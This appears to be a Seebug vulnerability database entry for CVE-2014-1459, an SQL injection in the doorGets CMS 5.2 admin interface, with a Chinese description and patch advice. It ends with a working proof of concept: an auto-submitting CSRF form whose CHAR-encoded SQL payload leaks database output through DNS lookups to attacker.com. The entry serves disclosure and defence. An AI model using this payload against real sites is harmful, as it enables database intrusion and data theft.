Lucene search

K
seebugRootSSV:61393
HistoryFeb 08, 2014 - 12:00 a.m.

doorGets CMS SQL注入漏洞

2014-02-0800:00:00
Root
www.seebug.org
16

EPSS

0.002

Percentile

52.9%

CVE ID:CVE-2014-1459

doorGets CMS是一款内容管理系统。

由于传递到"/dg-admin/index.php"脚本的"_position_down_id" HTTP POST参数未能充分过滤,攻击者可以通过访问管理界面在应用程序的数据库中执行任意SQL命令。
0
doorGets CMS 5.2
厂商补丁:

doorGets CMS

更新至2014年1月15日之后发布的5.2版本:
http://www.doorgets.com


                                                The following exploitation example is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will use a CSRF vector to send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):
<form action="http://[host]/dg-admin/?controller=rubriques" method="post" name="main">
<input type="hidden" name="_position_down_id" value="1 AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHA R(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114 )))) -- ">
<input type="hidden" name="_position_down_position" value="1">
<input type="hidden" name="_position_down_submit" value="1">
<input type="hidden" name="_position_down_type" value="down">
<input type="submit" id="btn">
</form>
<script>
document.getElementById('btn').click();
</script>